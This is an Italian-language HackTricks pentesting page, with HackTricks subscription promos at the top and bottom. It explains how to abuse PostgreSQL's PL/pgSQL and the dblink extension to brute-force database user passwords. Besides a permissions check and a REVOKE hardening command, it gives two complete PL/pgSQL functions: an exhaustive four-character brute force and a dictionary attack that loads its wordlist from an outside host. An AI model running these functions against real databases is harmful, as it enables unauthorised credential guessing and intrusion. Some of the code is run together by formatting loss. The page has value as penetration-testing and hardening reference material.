Lavori in una azienda di sicurezza informatica? Vuoi vedere la tua azienda pubblicizzata in HackTricks? o vuoi avere accesso all'ultima versione di PEASS o scaricare HackTricks in PDF? Controlla i PACCHETTI DI ABBONAMENTO!
PL/pgSQL è un linguaggio di programmazione completo che va oltre le capacità di SQL offrendo un controllo procedurale avanzato. Ciò include l'utilizzo di cicli e varie strutture di controllo. Le funzioni create nel linguaggio PL/pgSQL possono essere invocate da istruzioni SQL e trigger, ampliando la portata delle operazioni all'interno dell'ambiente del database.
È possibile sfruttare questo linguaggio per chiedere a PostgreSQL di forzare le credenziali degli utenti, ma esse devono esistere nel database. È possibile verificare la loro esistenza utilizzando:
SELECT lanname,lanacl FROM pg_language WHERE lanname ='plpgsql';lanname | lanacl---------+---------plpgsql |
Di default, la creazione di funzioni è un privilegio concesso a PUBLIC, dove PUBLIC si riferisce a ogni utente del sistema di database. Per prevenire ciò, l'amministratore potrebbe aver revocato il privilegio di USAGE dal dominio PUBLIC:
REVOKE ALL PRIVILEGES ONLANGUAGE plpgsql FROM PUBLIC;
In tal caso, la nostra query precedente produrrebbe risultati diversi:
SELECT lanname,lanacl FROM pg_language WHERE lanname ='plpgsql';lanname | lanacl---------+-----------------plpgsql | {admin=U/admin}
Nota che per far funzionare lo script seguente è necessario che esista la funzione dblink. Se non esiste, puoi provare a crearla con
CREATE EXTENSION dblink;
Brute Force della Password
Ecco come è possibile eseguire un attacco di brute force su una password di 4 caratteri:
//Create the brute-forcefunctionCREATE OR REPLACEFUNCTIONbrute_force(host TEXT, port TEXT,username TEXT, dbname TEXT) RETURNSTEXTAS$$DECLAREword TEXT;BEGINFOR a IN65..122LOOPFOR b IN65..122LOOPFOR c IN65..122LOOPFOR d IN65..122LOOPBEGINword := chr(a) || chr(b) || chr(c) || chr(d);PERFORM(SELECT*FROM dblink(' host='|| host ||' port='|| port ||' dbname='|| dbname ||' user='|| username ||' password='|| word,'SELECT 1')RETURNS (i INT));RETURN word;EXCEPTIONWHEN sqlclient_unable_to_establish_sqlconnectionTHEN-- do nothingEND;ENDLOOP;ENDLOOP;ENDLOOP;ENDLOOP;RETURNNULL;END;$$ LANGUAGE'plpgsql';//Call the functionselect brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
Nota che anche il forzamento di 4 caratteri potrebbe richiedere diversi minuti.
Potresti anche scaricare un wordlist e provare solo quelle password (attacco a dizionario):
//Create the functionCREATE OR REPLACEFUNCTIONbrute_force(host TEXT, port TEXT,username TEXT, dbname TEXT) RETURNSTEXTAS$$BEGINFOR word IN (SELECT word FROM dblink('host=1.2.3.4user=namepassword=qwertydbname=wordlists','SELECT word FROM wordlist')RETURNS (word TEXT)) LOOPBEGINPERFORM(SELECT*FROM dblink(' host='|| host ||' port='|| port ||' dbname='|| dbname ||' user='|| username ||' password='|| word,'SELECT 1')RETURNS (i INT));RETURN word;EXCEPTIONWHEN sqlclient_unable_to_establish_sqlconnection THEN-- do nothingEND;ENDLOOP;RETURNNULL;END;$$ LANGUAGE'plpgsql'-- Call the functionselect brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
Lavori in un'azienda di sicurezza informatica? Vuoi vedere la tua azienda pubblicizzata in HackTricks? o vuoi avere accesso all'ultima versione di PEASS o scaricare HackTricks in PDF? Controlla i PACCHETTI DI ABBONAMENTO!